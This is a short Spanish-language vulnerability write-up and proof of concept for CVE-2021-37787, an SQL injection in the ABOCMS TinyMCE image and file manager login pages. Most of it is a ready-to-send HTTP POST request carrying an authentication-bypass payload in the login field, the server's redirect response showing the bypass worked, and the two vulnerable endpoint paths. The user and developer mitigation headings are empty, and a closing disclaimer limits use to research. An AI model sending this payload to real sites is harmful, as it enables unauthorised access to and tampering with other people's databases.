
CVE-2021-37787
Existe una vulnerabilidad crítica de inyección SQL en ABOCMS dentro del módulo TinyMCE. La vulnerabilidad surge debido a una saneamiento insuficiente de las entradas en la interacción del módulo TinyMCE con la base de datos, lo que permite a un atacante inyectar consultas SQL maliciosas. Esto puede provocar acceso no autorizado a los datos, modificación o incluso el compromiso total de la base de datos subyacente.
El endpoint vulnerable se encuentra en el procesamiento de las entradas proporcionadas por el usuario en el módulo TinyMCE. Un atacante puede explotar esta falla para ejecutar comandos SQL arbitrarios.
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded
return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html
La vulnerabilidad se puede activar a través del siguiente endpoint:
/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php
Para usuarios:
Para desarrolladores:
Esta PoC se proporciona únicamente con fines educativos y de investigación en seguridad. No use este código para dañar sistemas o redes sin el permiso explícito del propietario. El autor no es responsable de ningún uso indebido o daño causado por esta PoC.